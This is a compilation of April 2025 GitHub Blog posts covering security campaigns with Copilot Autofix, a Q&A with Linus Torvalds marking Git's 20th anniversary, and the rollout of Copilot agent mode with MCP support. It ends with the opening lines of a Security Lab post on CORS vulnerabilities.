
The GitHub Blog

Stay inspired with updates, ideas, and insights from GitHub to aid developers in software design and development.

April 8, 2025  16:00:16

We get it: you'd rather spend your time shipping features than chasing security alerts. That's why we've built tools like Copilot Autofix directly into pull requests, enabling teams to remediate security issues up to 60% faster, significantly reducing Mean Time to Remediation (MTTR) compared to manual fixes. Autofix helps you catch vulnerabilities before they ever make it into production, so you spend less time fixing bugs and more time coding.

But what about the vulnerabilities already lurking in your existing code? Every unresolved security finding adds to your security debt: a growing risk you can't afford to ignore. In fact, our data shows that teams typically address only 10% of their security debt, leaving 90% of vulnerabilities unprioritized and unresolved.

A graphic showing that with security campaigns, 55% of security debt is fixed by developers compared to around only 10% of security debt without security campaigns.

Our data shows that security debt is the biggest unaddressed risk our customers face: historically, only 10% of lingering security debt in merged code gets addressed, meaning 90% of risks go unprioritized. With security campaigns, 55% of the security debt included in a campaign gets fixed.

Security campaigns bridge this gap by bringing security experts and developers together, streamlining the vulnerability remediation process right within your workflow, and at scale. Using Copilot Autofix to generate code suggestions for up to 1,000 code scanning alerts at a time, security campaigns help security teams take care of triage and prioritization, while you can quickly resolve issues using Autofix, without breaking your development momentum.

Security campaigns in action

Since security campaigns were launched in public preview at GitHub Universe last year, we have seen organizations at all different stages of their security journey try them out. Whether they've been used to reduce security debt across an entire organization or to target alerts in critical repositories, security campaigns have delivered value for both developers and security teams in their efforts to tackle security debt.

Security campaigns simplify life for our developers. They can easily group alerts from multiple repositories, reducing time spent on triage and prioritization while quickly remediating the most critical issues with the help of Copilot Autofix.

- Jose Antonio Moreno, DevSecOps engineer, Lumen

GitHub security campaigns is a game-changer for our development teams. It's educated us about existing vulnerabilities, brought our engineers together to collaboratively tackle fixes, and significantly improved our remediation time.

- GP, security engineer, Alchemy

In a sample of early customers, we found that 55% of alerts included in security campaigns were fixed, compared to only around 10% of security debt outside security campaigns, a 5.5x improvement. This shows that when alerts are included in a campaign, you can spend more time fixing the security debt, since the prioritization of which alerts to work on has already been taken care of by your security team. In fact, our data shows that alerts in campaigns get roughly twice as much developer engagement as those outside of campaigns.

Security campaigns: how they work

Triaging and prioritizing security problems already present in a codebase has to happen as part of the normal software development lifecycle. Unfortunately, when product teams are under pressure to ship faster, they often don't have enough time to dig through their security alerts to decide which ones to address first. Luckily, in most software organizations, there is already a group of people who are experts in understanding these risks: the security team. With security campaigns, we play to the different strengths of developers and security teams in a new collaborative approach to addressing security debt.

  1. Security teams prioritize which risks need to be addressed across their repositories in a security campaign. Security campaigns come with predefined templates based on commonly used themes (such as the MITRE top 10 known exploited vulnerabilities) to help scope the campaign. GitHub's security overview also provides statistics and metrics summarizing the overall risk landscape.
  2. Once the campaign alerts are selected and a timeline is specified, the campaign is communicated to any developers who are impacted by the campaign. The work defined in a campaign is brought to developers where they work on GitHub, so that it can be planned and managed just like any other feature work.

    A screenshot showing a SQL injection security campaign in progress on GitHub.

  3. Copilot Autofix immediately starts suggesting automatic remediations for all alerts in a campaign, as well as custom help text to explain the problems. Fixing an alert becomes as easy as reviewing a diff and creating a pull request.

Crucially, security campaigns are not just lists of alerts. Alongside the alerts, campaigns are complemented with notifications to ensure that developers are aware of which alert they (or their team) are responsible for. To foster stronger collaboration between developers and the security team, campaigns also have an appointed manager to oversee the campaign progress and be on hand to assist developers. And of course: security managers have an organization-level view on GitHub to track progress and collaborate with developers as needed.

Starting today, you can also access several new features to plan and manage campaign-related work more effectively:

  • Draft security campaigns: security managers can now iterate on the scope of campaigns and save them as draft campaigns before making them available to developers. With draft campaigns, security managers can ensure that the highest priority alerts are included before the work goes live.
  • Automated GitHub Issues: security managers can optionally create GitHub Issues in repositories that have alerts included in the campaign. These issues are created and updated automatically as the campaign progresses and can be used by teams to track, manage and discuss campaign-related work.
  • Organization-level security campaign statistics: security managers can now view aggregated statistics showing the progress across all currently-active and past campaigns.

For more information about using security campaigns, see About security campaigns in the GitHub documentation.

The post Found means fixed: Reduce security debt at scale with GitHub security campaigns appeared first on The GitHub Blog.

April 8, 2025  17:42:59

Exactly twenty years ago, on April 7, 2005, Linus Torvalds made the very first commit to a new version control system called Git. Torvalds famously wrote Git in just 10 days after Linux kernel developers lost access to their proprietary tool, BitKeeper, due to licensing disagreements. In fact, in that first commit, he'd written enough of Git to use Git to make the commit!

Git's unconventional and decentralized design, nowadays ubiquitous and seemingly obvious, was revolutionary at the time, and reshaped how software teams collaborate and develop. (To wit, GitHub!)

To celebrate two decades of Git, we sat down with Linus himself to revisit those early days, explore the key design decisions behind Gitā€™s lasting success, and discuss how it forever changed software development.

Check out the transcript of our interview below, and check back later this week for the full video of our interview.

Want to watch a sneak peek of our video interview with Linus? 👇

The following transcript has been lightly edited for clarity.


Taylor Blau: It's been 20 years, almost to the hour, since Git was self-hosted enough to write its initial commit. Did you expect to be sitting here 20 years later, still using it and talking about it?

Linus Torvalds: Still using it, yes. Maybe not talking about it. I mean, that has been one of the big surprises – basically how much it took over the whole SCM world. I saw it as a solution to my problems, and I obviously thought it was superior. Even literally 20 years ago to the day, I thought that first version, which was pretty raw – to be honest, even that version was superior to CVS.

But at the same time, I'd seen CVS just hold on to the market – I mean, SVN came around, but it's just CVS in another guise, right? – for many, many decades. So I was like, okay, this market is very sticky. I can't use CVS because I hate it with a passion, so I'll do my own thing. I couldn't use BitKeeper, obviously, anymore. So I was like, okay, I'll do something that works for me, and I won't care about anybody else. And really that showed in the first few months and years – people were complaining that it was kind of hard to use, not intuitive enough. And then something happened, like there was a switch that was thrown.

"I'll do something that works for me, and I won't care about anybody else."

Well, you mentioned BitKeeper. Maybe we can talk about that.

Sure.

Pretty famously, you wrote the initial version of Git in around 10 or so days as a replacement SCM for the kernel.

Yes and no. It was actually fewer than – well, it was about 10 days until I could use it for the kernel, yes. But to be fair, the whole process started like December or November the year before, so 2004.

What happened was BitKeeper had always worked fairly well for me. It wasn't perfect, but it was light years ahead of anything else I've tried. But BitKeeper was always, like, not entirely welcomed by the kernel community because it was commercial. It was free for open source use because Larry McVoy, who I knew, really liked open source. I mean, at the same time, he was making a business around it and he wanted to sell BitKeeper to big companies. [It] not being open source and being used for one of the biggest open source projects around was kind of a sticking point for a lot of people. And it was for me, too.

I mean, to some degree I really wanted to use open source, but at the same time I'm very pragmatic and there was nothing open source that was even remotely good enough. So I was kind of hoping that something would come up that would be better. But what did come up was that Tridge in Australia basically reverse engineered BitKeeper, which wasn't that hard because BitKeeper internally was basically a good wrapper around SCCS, which goes back to the 60s. SCCS is almost worse than CVS.

But that was explicitly against the license rules for BitKeeper. BitKeeper was like, you can use this for open source, but you can't reverse engineer it. And you can't try to clone BitKeeper. And that made for huge issues. And this was all in private, so I was talking to Larry and I was emailing with Tridge and we were trying to come up with a solution, but Tridge and Larry were really on completely opposite ends of the spectrum and there was no solution coming up.

So by the time I started writing Git, I had actually been thinking about the issue for four months and thinking about what worked for me and thinking about "How do I do something that does even better than BitKeeper does but doesn't do it the way BitKeeper does it?" I did not want to be in the situation where Larry would say, "Hey, you did the one thing you were not supposed to do."

"...how do I do something that does even better than BitKeeper does, but doesn't do it the way BitKeeper does it."

So yes, the writing part was maybe 10 days until I started using Git for the kernel, but there was a lot of mental going over what the ideas should be.

I want to talk about maybe both of those things. We can start with that 10-day period. So as I understand it, you had taken that period as a time away from the kernel and had mostly focused on Git in isolation. What was that transition like for you to just be working on Git and not thinking about the kernel?

Well, since it was only two weeks, it ended up being that way. It wasn't actually a huge deal. I'd done things like that just for – I've been on, like in the last 35 years, I've been on vacation a couple of times, right, not very many times. But I have been away from the kernel for two weeks at a time before.

And it was kind of interesting because it was – one of my reactions was how much easier it is to do programming in the userspace. There's so much less you need to care about. You don't need to worry about memory allocations. You don't need to worry about a lot of things. And debugging is so much easier when you have all this infrastructure that you're writing when you're doing a kernel.

So it was actually somewhat – I mean, I wouldn't say relaxing, but it was fun to do something userspace-y where I had a fairly clear goal of what I wanted. I mean, a clear goal in the sense I knew the direction. I didn't know the details.

One of the things I find so interesting about Git, especially 20 years on, is it's so... the development model that it encourages, to me, seems so simple that it's almost obvious at this point. But I don't say that as a reductive term. I think there must have been quite a lot of thought put into distilling the universe of source control ideas down into something that became Git. Tell me, what were the non-obvious choices you made at the time?

The fact that you say it's obvious now, I think it wasn't obvious at the time. I think one of the reasons people found Git to be very hard to use was that most people who started using Git were coming from a background of something CVS-like. And the Git mindset, I came at it from a file system person's standpoint, where I had this disdain and almost hatred of most source control management projects, so I was not at all interested in maintaining the status quo.

And like the biggest issue for me – well, there were two huge issues. One was performance – back then I still applied a lot of patches, which, I mean, Git has made almost go away because now I just merge other people's code.

But for me, one of the goals was that I could apply a patch series in basically half a minute, even when it was like 50, 100 patches.

You shouldn't need a coffee to...

Exactly. And that was important to me because it's actually a quality-of-life thing. It's one of those things where if things are just instant, some mistake happens, you see the result immediately and you just go on and you fix it. And some of the other projects I had been looking at took like half a minute per patch, which was not acceptable to me. And that was because the kernel is a very large project and a lot of these SCMs were not designed to be scalable.

"And that was important to me because it's actually a quality-of-life thing."

So that was one of the issues. But the other issue really was, I knew I needed it to be distributed, but it needed to be really, really stable. And people kind of think that using the SHA-1 hashes was a huge mistake. But to me, SHA-1 hashes were never about the security. It was about finding corruption.

Because we'd actually had some of that during the BitKeeper things, where BitKeeper used CRCs and MD5s, right, but didn't use it for everything. So one of the early designs for me was absolutely everything was protected by a really good hash.

And that kind of drove the whole project: having two or three really fundamental design ideas, which is why at a low level it is actually fairly simple, right? And then the complexities are in the details and the user interfaces and in all the things it has to be able to do, because everybody wants it to do crazy things. But having a low-level design that has a few core concepts made it easier to write, much easier to think about, and also, to some degree, to explain to people what the ideas are.

And I kind of compare it to Unix. Unix has like a core philosophy of everything is a process, everything is a file, you pipe things between things. And then the reality is it's not actually simple. I mean, there's the simple concepts that underlie the philosophy, but then all the details are very complicated.

And I think that's what made me appreciate Unix in the first place. And I think Git has some of the same kind of thing: there's a fundamental core simplicity to the design and then there's the complexity of implementation.

There's a through line from Unix into the way that Git was designed.

Yes.

You mentioned SHA-1. One of the things that I think about in this week or two where you were developing the first version of Git is you made a lot of decisions that have stuck with us.

Yeah.

Were there any, including SHA-1 or not, that you regretted or wish you had done differently?

Well, I mean, SHA-1 I regret in the sense that I think it caused a lot of pointless churn with the whole "trying to support SHA-256 as well as SHA-1." And I understand why it happened, but I do think it was mostly pointless.

I don't think there was a huge, real need for it, but people were worried, so it was short. So I think there's a lot of wasted effort there. There's a number of other small issues. I think I made a mistake in how the index file entries are sorted. I think there's these stupid details that made things harder than they should be.

But at the same time, many of those things could be fixed, but they're small enough. It doesn't really matter. All the complexities are elsewhere in the end.

So it sounds like you have few regrets. I think that's good. Were there any moments where you weren't sure that what you were trying to achieve was going to work or come together or be usable? Or did you already have a pretty clear idea?

I had a clear idea of the initial stages, but I wasn't sure how it would work in the long run. So honestly, after the first week, I had something that was good for applying patches, but not so much for everything else. I had the basics for doing merges, and the data structures were in place for that, but it actually took, I think, an additional week before I did my first merge.

There were a number of things where I had kind of the big picture and result in mind, but I wasn't sure if I'd get there. Yeah, the first steps, I mean the first week or two, I mean, you can go and look at the code – and people have – and it is not complicated code.

No.

I think the first version was 10,000 lines or something.

You can more or less read it in a single sitting.

Yeah, and it's fairly straightforward and doesn't do a lot of error checking and stuff like that. It's really a, "Let's get this working because I have another project that I consider to be more important, that I need to get back to." It really was. It happened where I would hit issues that required me to do some changes.

"There were a number of things where I had kind of the big picture and result in mind, but I wasn't sure if I'd get there."

The first version – I think we ended up doing a backwards-incompatible object store transfer at one point. At least fsck complains about some of the old objects we had because I changed the data format.

I didn't know where that came from.

Yeah, no. The first version just was not doing everything it needed to do.

And I forget if I actually did a conversion or not. I may not have ever needed to convert. And we just have a few warnings for a few objects in the kernel where fsck will say, "Hey, this is an old, no longer supported format." That kind of thing. But on the other, on the whole, it really worked, I mean, surprisingly well.

The big issue was always people's acceptance of it.

Right.

And that took a long time.

"But on the other, on the whole, it really worked, I mean, surprisingly well."

Well, we talked a little bit about how merging was put in place but not functional until maybe week two or week three. What were the other features that you left out of the initial version that you later realized were actually quite essential to the project?

Well, it wasn't so much "later realized," it was stuff that I didn't care about, but I knew that if this is going to go anywhere, somebody else will. I mean, the first week when I was using it for the kernel, I was literally using the raw, what are now called "plumbing commands" by hand.

Of course.

Because there was no so-called porcelain. There was nothing above that to make it usable. So to make a commit, you'd do these very arcane things.

Set your index, commit-tree.

Yeah, commit-tree, write, and that just returns an SHA that you write by hand into the head file and that was it.

Did hash-object exist in the first version?

I think that was one of the first binaries that I had where I could just check that I could hash everything by hand and it would return the hash to standard out, then you could do whatever you wanted to it. But it was like the early porcelain was me scripting shell scripts around these very hard-to-use things.

And honestly, it wasn't easy to use even with my shell scripts.

But to be fair, the initial target audience for this were pretty hardcore kernel people who had been using BitKeeper. They at least knew a lot of the concepts I was aiming for. People picked it up.

It didn't take that long before some other kernel developers started actually using it. I was actually surprised by how quickly some source control people started coming in. And I started getting patches from the outside within days of making the first Git version public.

I want to move forward a bit. You made the decision to hand off maintainership to Junio pretty early on in the project. I wonder if you could tell me a little bit about what it's been like to watch him run the project and really watch the community interact with it at a little bit of a distance after all these years?

I mean, to be honest, I maintained Git for like three or four months. I think I handed it off in August [of 2005] or something like that.

And when I handed it off, I truly just handed it off. I was like, "I'm still around." I was still reading the Git mailing list, which I don't do anymore. Junio wanted to make sure that if he asked me anything, I'd be okay.

But at the same time, I was like, this is not what I want to do. I mean, this is... I still feel silly. My oldest daughter went off to college, and two months later, she sends this text to me and says that I'm more well-known at the computer science lab for Git than for Linux because they actually use Git for everything there. And I was like, Git was never a big thing for me. Git was an "I need to get this done to do the kernel." And it's kind of ridiculous that, yes, I used four months of my life maintaining it, but now, 20 years later...

Yes, you should definitely talk to Junio, not to me, because he's been doing a great job and I'm very happy it worked out so well. But to be honest, I'll take credit for having worked with people on the internet for long enough that I was like – during the four months I was maintaining Git, I was pretty good at picking up who has got the good taste to be a good maintainer.

My oldest daughter went off to college, and two months later, she sends this text to me and says that I'm more well known at the computer science lab for Git than for Linux because they actually use Git for everything there.

That's what it's about – taste – for you.

For me, it's hard to describe. You can see it in patches, you can see it in how they react to other people's code, "how they think" kind of things. Junio was not the first person in the project, but he was one of the early ones that was around from pretty much week one after I had made it public.

So he was one of the early persons – but it wasn't like, you're the first one, tag, you're it. It was more like, okay, I have now seen this person work for three months and I don't want to maintain this project. I will ask him if he wants to be the maintainer. I think he was a bit nervous at first, but it really has been working out.

Yeah, he's certainly run the project very admirably in the...

Yeah, I mean, so taste is to me very important, but practically speaking, the fact that you stick around with a project for 20 years, that's the even more important part, right? And he has.

I think he's knowledgeable about almost every area of the tree to a surprising degree.

Okay, so we've talked a lot about early Git. I want to talk a little bit about the middle period of Git maybe, or maybe even the period we're in now.

One of the things that I find so interesting about the tool, given how ubiquitous it's become, is that it's clearly been effective at aiding the kernel's development, but it's also been really effective for university students writing little class projects on their laptops. What do you think was unique about Git that made it effective at both extremes of the software engineering spectrum?

So the distributed nature really ends up making so many things so easy, and that was one big part that set Git apart from pretty much all SCMs before... I mean, there had been distributed SCMs, but there had, as far as I know, never been something where it was like the number one design goal – I mean, along with the other number one design goals – where it means that you can work with Git purely locally and then later, if you want to make it available in any other place, it's so easy.

And that's very different from, say, CVS, where you have to set up this kind of repository, and if you ever want to move it anywhere else it's just very, very painful, and you can't share it with somebody else without losing track of it.

Or there's always going to be one special repository when you're using a traditional SCM, and the fact that Git didn't do that, and very much by design didn't do that, I mean, that's what made services like GitHub trivial. I mean, I'm trivializing GitHub because I realized there's a lot of work in making all the infrastructure around Git, but at the same time the basic Git hosting site is basically nothing, because the whole design of Git is designed around making it easy to copy, and every repository is the same and equal.

And I think that ended up being what made it so easy to then use as an individual developer. When you make a new Git repository, it's not a big deal. It's like, you do a git init and you're done. And you don't need to set up any infrastructure and you don't need to do any of the stuff that you traditionally needed to do with an SCM. And then if that project ever grows to be something where you decide, "Oh, maybe I want other people to work with it," that works too. And again, you don't have to do anything about it. You just push it to GitHub and again, you're done.

That was something I very much wanted. I didn't realize how many other people wanted it, too. I thought people were happy with CVS and SVN. Well, I didn't really think that, but I thought they were sufficient for most people, let's put it that way.

I've lived my whole life with version control as part of software development, and one of the things I'm curious about is how you see Git's role in shaping how software development gets done today.

That's too big of a question for me. I don't know. It wasn't why I wrote Git. I wrote it for my own issues.

I think GitHub and the other hosting services have made it clear how easy it is now to make all these random small projects in ways that it didn't used to be. And that has resulted in a lot of dead projects too. You find these one-off things where somebody did something and left it behind and it's still there.

But does that really change how software development is done in the big picture? I don't know. I mean, it changes the details. It makes collaboration easier to some degree. It makes it easier to do these throwaway projects. And if they don't work, they don't work. And if they do work, now you can work together with other people. But I'm not sure it changed anything fundamentally in software development.

"It makes collaboration easier to some degree."

Moving ahead a little bit, modern software development has never been changing faster than it is today...

Are you going to say the AI word?

I'm not going to say the AI word, unless you want me to.

No, no, no.

...what are some of the areas of the tool that you think have evolved or maybe still need to evolve to continue to support the new and demanding workflows that people are using it for?

I'd love to see more bug tracking stuff. I mean, everybody is doing that. I mean, there are, whether you call it bug tracking or issues or whatever you want to call it, I'd love to see that be more unified. Because right now it's very fragmented, where every single hosting site does their own version of it.

And I understand why they do it. A, there is no kind of standard good base. And B, it's also a way to do the value add and keep people in that ecosystem even when Git itself means that it's really easy to move the code.

But I do wish there was a more unified thing where bug tracking and issues in general would be something that would be more shared among the hosting sites.

You mentioned earlier that it's at least been a while since you regularly followed the mailing list.

Yeah.

In fact, it's been a little bit of time since you even committed to the project. I think by my count, August of 2022 was the last time...

Yeah, I have a few experimental patches in my tree that I just keep around. So these days I do a pull of the Git sources and I have, I think, four or five patches that I use myself. And I think I've posted a couple of them to the Git mailing list, but they're not very important. They're like details that tend to be very specific to my workflow.

But honestly, I mean, this is true of the Linux kernel, too. I've been doing Linux for 35 years, and it did everything I needed in the first year – right? And the thing that keeps me going on the kernel side is, A, hardware keeps evolving, and a kernel needs to evolve with that, of course. But B, it's all the needs of other people. Never in my life would I need all of the features that the kernel does. But I'm interested in kernels, and I'm still doing that 35 years later.

When it came to Git, it was like Git did what I needed within the first year. In fact, mostly within the first few months. And when it did what I needed, I lost interest. Because when it comes to kernels, I'm really interested in how they work, and this is what I do. But when it comes to SCMs, it's like – yeah, I'm not at all interested.

"When it came to Git, it was like Git did what I needed within the first year. In fact, mostly within the first few months."

Have there been any features in the project over the past handful of years that you've followed and found interesting?

I liked how the merge strategies got slightly smarter. I liked how some of the scripts were finally rewritten in C just to make them faster, because even though I don't apply, like, 100 patch series anymore, I do end up doing things like rebasing for test trees and stuff like that and having some of the performance improvements.

But then, I mean, those are fairly small implementation details in the end. They're not the kind of big changes that, I mean – I think the biggest change that I was still tracking a few years ago was all the multiple hashes thing, which really looks very painful to me.

Have there been any tools in the ecosystem that you've used alongside? I mean, I'm a huge tig user myself. I don't know if you've ever used this.

I never – no, even early on when we had, like, when Git was really hard to use and there were like these add-on UIs, the only wrapper around Git I ever used was gitk. And that was obviously integrated into Git fairly quickly, right? But I still use the entire command language. I don't use any of the editor integration stuff. I don't do any of that because my editor is too stupid to integrate with anything, much less Git.

I mean, I occasionally do statistics on my Git history usage just because I'm like, "What commands do I use?" And it turns out I use five Git commands. And git merge and git blame and git log are three of them, pretty much. So, I'm a very casual user of Git in that sense.

I have to ask about what the other two are.

I mean obviously git commit and git pull. I did this top five thing at some point and it may have changed, but there's not a lot of – I do have a few scripts that then do use git rev-list and go really low and do statistics for the project...

In terms of your interaction with the project, what do you feel like have been some of the features in the project, either from early on or in the time since, that maybe haven't gotten the appreciation they deserve?

I mean Git has gotten so much more appreciation than it deserves. But that's the reverse of what I would ask me. A big thing for me was when people actually started appreciating what Git could do instead of complaining about how different it was.

And that, I mean, that was several years after the initial Git. I think it was these strange web developers who started using Git in a big way. It's like Ruby on Rails, I think. Which I had no idea, I still don't know what Ruby even is. But the Ruby on Rails people started using Git sometime in 2008, something like this.

It was strange because it brought in a completely new kind of Git user – at least one that I hadn't seen before. It must have existed in the background, it just made it very obvious that suddenly you had all these young people who had never used SCM in their life before and Git was the first thing they ever used and it was what the project they were using was using, so it was kind of the default thing.

And I think it changed the dynamics. When you didn't have these old timers who had used a very different SCM their whole life, and suddenly you had young people who had never seen anything else and appreciated it, and instead of saying, "Git is so hard," I started seeing these people who were complaining about "How do I do this when this old project is in CVS?" So, that was funny.

But yeah, no. The fact that people are appreciating Git, I mean, way more than I ever thought. Especially considering the first few years when I got a lot of hate for it.

Really?

Oh, the complaints kept coming.

Tell me about it.

Oh, I mean, it's more like I can't point to details. You'd have to Google it. But the number of people who sent me, "Why does it do this?" And the flame wars over my choice of names. For example, I didn't have git status, which actually is one of the commands I use fairly regularly now.

It's in the top five?

It's probably not in the top five, but it's still something fairly common. I don't think I'd ever used it with CVS because it was so slow.

And people had all these expectations. So I just remember the first few years, the complaints about why the names of the subcommands are different for no good reason. And the main reason was I just didn't like CVS very much, so I did things differently on purpose sometimes.

And the shift literally between 2007 and 2010 – those years, when people went from complaining about how hard Git was to use to really appreciating some of the power of Git, was interesting to me.

I want to spend maybe just a moment thinking about the future of the project. In your mind, what are the biggest challenges that Git either is facing or will face?

I don't even know. I mean, it has just been so much more successful than I ever... I mean, the statistics are insane. It went from use for the kernel and a couple of other projects to being fairly popular to now being like 98% of the SCMs used. I mean, that's a number I saw in some report from last year.

So, I mean, it's – I don't know how true that is, but it's like, big. And in that sense, I wouldn't worry about challenges because I think SCMs, there is a very strong network effect. And that's probably why, once it took off, it took off in a big way. Just when every other project is using Git, by default, all the new projects will use Git, too. Because the pain of having two different SCMs for two different projects to work on is just not worth it.

So I would not see that as a challenge for Git as much as I would see it as a challenge for anybody else who thinks they have something better. And honestly, because Git does everything that I need, the challenges would likely come from new users.

I mean, we saw some of that. We saw some of that with people who used Git in ways that explicitly were things I consider to be the wrong approach. Like Microsoft, the monorepo for everything, which showed scalability issues. I'm not saying Microsoft was wrong to do that. I'm saying this is literally what Git was not designed to do.

I assume most of those problems have been solved because I'm not seeing any complaints, but at the same time I'm not following the Git mailing list as much as I used to.

Well, that's very kind. That's most of what I work on, so I appreciate it.

Okay. But I mean, also, people who – I don't know, I don't even know if the large file issue is considered to be solved. If you want to put a DVD image in Git, that was like, why would you ever want to do that?

But, I mean, that's the challenge. When Git is everywhere, you find all these people who do strange things that you would never imagine – that I didn't imagine and that I consider to be actively wrong.

But hey, I mean, that's a personal opinion. Clearly other people have very different personal opinions. So that's always a challenge. I mean, that's something I see in the kernel, too, where I go, why the hell are you doing that? I mean, that shouldn't work, but you're clearly doing it.

"When Git is everywhere, you find all these people who do strange things that you would never imagine – that I didn't imagine and that I consider to be actively wrong."

We talked about how Git is obviously a huge dominant component in software development. At the same time, there are new version control upstarts that seem to pop up. Pijul comes to mind, Jujutsu, Piper, and things like that. I'm curious if you've ever tried any of them.

No, I don't. I mean, literally, since I came from this, from being completely uninterested in source control, why would I look at alternatives now that I have something that works for me?

I really came into Git not liking source control, and now I don't hate it anymore. And I think that databases are my particular – like, that's the most boring-thing-in-life thing. But SCMs still haven't been something I'm really interested in.

"I really came into Git not liking source control, and now I don't hate it anymore."

You've given me a little bit of a lead-in to my last question for you. So on schedule, Linux came about 34 years ago, Git 20...

Oh, that question.

And so we're maybe five or so years overdue for the next big thing.

No, no, I see it the other way around. All the projects that I've had to make, I had to make because I couldn't find anything better that somebody else did.

But I much prefer other people solving my problems for me. So me having to come up with a project is actually a failure of the world – and the world just hasn't failed in the last 20 years for me.

I started doing Linux because I needed an operating system and there was nothing that suited my needs. I started doing Git for the same reason. And there hasn't been any... I started Subsurface, which is my divelog, well, no longer my divelog software, but that was so specialized that it never took off in a big way. And that solved one particular problem, but my computer use is actually so limited that I think I've solved all the problems.

Part of it is probably, I've been doing it so long that I can only do things in certain ways. I'm still using the same editor that I used when I was in college because my fingers have learned one thing and there's no going back. And I know the editor is crap and I maintain it because it's a dead project that nobody else uses.

"But I much prefer other people solving my problems for me. So me having to come up with a project is actually a failure of the world – and the world just hasn't failed in the last 20 years for me."

So, I have a source tree and I compile my own version every time I install a new machine, and I would suggest nobody ever use that editor, but I can't. I've tried multiple times to find an editor that is more modern and does fancy things like colorize my source code and do things like that. And every time I try it, I'm like, "Yeah, these hands are too old for this." So I really hope there's no project that comes along that makes me go, "I have to do this."

Well, on that note.

On that note.

Thank you for 20 years of Git.

Well, hey, I did it for my own very selfish reasons. And really – I mean, this is the point to say again that yes, out of the 20 years, I spent four months on it. So really, all the credit goes to Junio and all the other people who are involved in Git that have by now done so much more than I ever did.

In any event, thank you.

The post Git turns 20: A Q&A with Linus Torvalds appeared first on The GitHub Blog.

April 6, 2025  20:16:35

Allow us to reintroduce ourselves: GitHub Copilot is getting a whole lot more agentic with increased context of your tools and services, powered by the world's leading models, starting today. 👍

We are excited to roll out agent mode in Visual Studio Code to all users, now complete with MCP support that unlocks access to any context or capabilities you want. What's more, we are thrilled to release a new open source and local GitHub MCP server, giving you the ability to add GitHub functionality to any LLM tool that supports MCP. 🤖

In keeping with our commitment to offer multi-model choice, we're making Anthropic Claude 3.5, 3.7 Sonnet, 3.7 Sonnet Thinking, Google Gemini 2.0 Flash, and OpenAI o3-mini generally available via premium requests, included in all paid Copilot tiers. These premium requests are in addition to unlimited requests for agent mode, context-driven chat, and code completions that all paid plans have when using our base model (👀 more below). With the new Pro+ tier, individual developers get the most out of the latest models with Copilot.

The agent awakening doesn't stop there. We are also announcing the general availability of the Copilot code review agent, which in just over a month in preview has been used by over 1 million developers on GitHub. Plus, the general availability of next edit suggestions so you can tab tab tab your way to coding glory. 🏆

Agent mode in VS Code

Agent mode is progressively rolling out to VS Code users in stable, as we aim for full availability to all users in the coming weeks. You can also manually enable it now. Compared to chat or multi-file edits, which allow you to propose code changes across multiple files in your workspace, agent mode is fundamentally capable of taking action to translate your ideas into code. With simple prompts, agent mode takes Copilot beyond answering a question, instead completing all necessary subtasks across automatically identified or generated files to ensure your primary goal is achieved. Agent mode can suggest terminal commands or tool calls and ask you to execute them. It also analyzes run-time errors with self-healing capabilities.

Since the launch to VS Code Insiders in February, developers have been using agent mode for a variety of tasks: from autofixing code gen errors, to building webapps, to yeeting commits – whatever that means. 🙂

A tweet from user Ryan '@xthree' that reads 'Used the new agent mode of VS Code's Copilot. I'm impressed. I threw at it what I thought was going to be a monumental task, and it scanned 4-5 different files, figured out how it was working, and made modifications in all those files to work exactly how I wanted. First time.'
https://x.com/xthree/status/1902748372022264142

Agent mode is powered by your choice of Claude 3.5 and 3.7 Sonnet, Google Gemini 2.0 Flash, and OpenAI GPT-4o. Currently, agent mode achieves a pass rate of 56.0% on SWE-bench Verified with Claude 3.7 Sonnet. We anticipate that agent mode will grow more capable as chain-of-thought reasoning models continue to advance.

Model Context Protocol (MCP) is now available in public preview

Developers spend their days conducting a wide array of tasks to get the job done, from research, to navigating telemetry, to infrastructure management, to coding and debugging. And they use many tools for this, the so-called engineering stack. MCP allows you to equip agent mode with the context and capabilities it needs to help you, like a USB port for intelligence. When you enter a chat prompt in agent mode within VS Code, the model can use different tools to handle tasks like understanding database schema or querying the web. This setup allows for more interactive and context-sensitive coding support.

For example, with a prompt to "Update my GitHub profile to include the title of the PR that was assigned to me yesterday," agent mode would take that request, combined with the list of all available MCP tools, and ask an LLM what to do next. Over time, the agent would continue calling tools iteratively, until the task is complete.

Already, GitHub is home to a massive and growing MCP ecosystem that you can discover and use today. Here is a great repository that acts as a community inventory with some of the best MCP servers to use. The GitHub local MCP server equips agent mode with compelling capabilities such as searching across repositories and code, managing issues, and creating PRs – turning agent mode into a powerful user of the GitHub platform.

Get started by setting up local and remote MCP servers and using tools with agent mode in Visual Studio Code. To get started with the GitHub local MCP server, visit the repository, now supported natively in VS Code.

Premium model requests

Since GitHub Universe, we have introduced a number of new models for chat, multi-file edits, and now agent mode. With the general availability of these models, we are introducing a new premium request type. Premium requests are in addition to the unlimited requests for agent mode, context-driven chat, and code completions in all paid plans for our base model (currently: OpenAI GPT-4o).

Customers with Copilot Pro will receive 300 monthly premium requests, beginning on May 5, 2025. Customers with Copilot Business and Copilot Enterprise will receive 300 and 1000 monthly premium requests respectively, starting between May 12 and May 19, 2025. Until then, use of these premium models is unlimited.

We are also introducing a new Pro+ plan for individuals with 1500 monthly premium requests and access to the best models, like GPT-4.5, for $39 per month.

Copilot paid users[1] will also have the ability to pay as you go for additional premium request usage. Individuals and organizations can choose to opt in to use additional requests beyond their included amount, in addition to setting spending limits on requests to control costs with ease. GitHub Copilot Business and Enterprise administrators can manage requests via their Copilot Admin Billing Settings. Additional premium requests start at $0.04 per request.

Each premium model will consume a specific number of premium requests, allowing you to use a more powerful or efficient model when you need it, all while you have continued, unlimited access to Copilotā€™s base model.

Happy 50th birthday, Microsoft!

Today is also a hallmark moment in the history of technology: our mothership turns 50! From the creation of BASIC and MS-DOS, to the .NET Framework and VS Code, to the acquisition of GitHub – Microsoft has always been a developer company at heart. Half a century of dev love is no small feat. ❤️

Now, with GitHub Copilot – what started out as a developer platform company is a platform where anyone can be a developer. Together, GitHub and Microsoft fully intend on enabling a world with 1 billion developers. 🗺️

Here is Satya using agent mode to re-create MSFT's first BASIC in a single shot. Let the vibes take you away, Mr. Nadella. 🕺


  1. The option to purchase additional premium requests is not available to users who subscribe or have subscribed to Pro or Pro+ through GitHub Mobile on iOS or Android.

The post Vibe coding with GitHub Copilot: Agent mode and MCP support rolling out to all VS Code users appeared first on The GitHub Blog.

April 3, 2025  16:00:24

At GitHub Security Lab, one of the most common vulnerability types we find relates to the cross-origin resource sharing (CORS) mechanism. CORS allows a server to instruct a browser to permit loading resources from specified origins other than its own, such as a different domain or port.

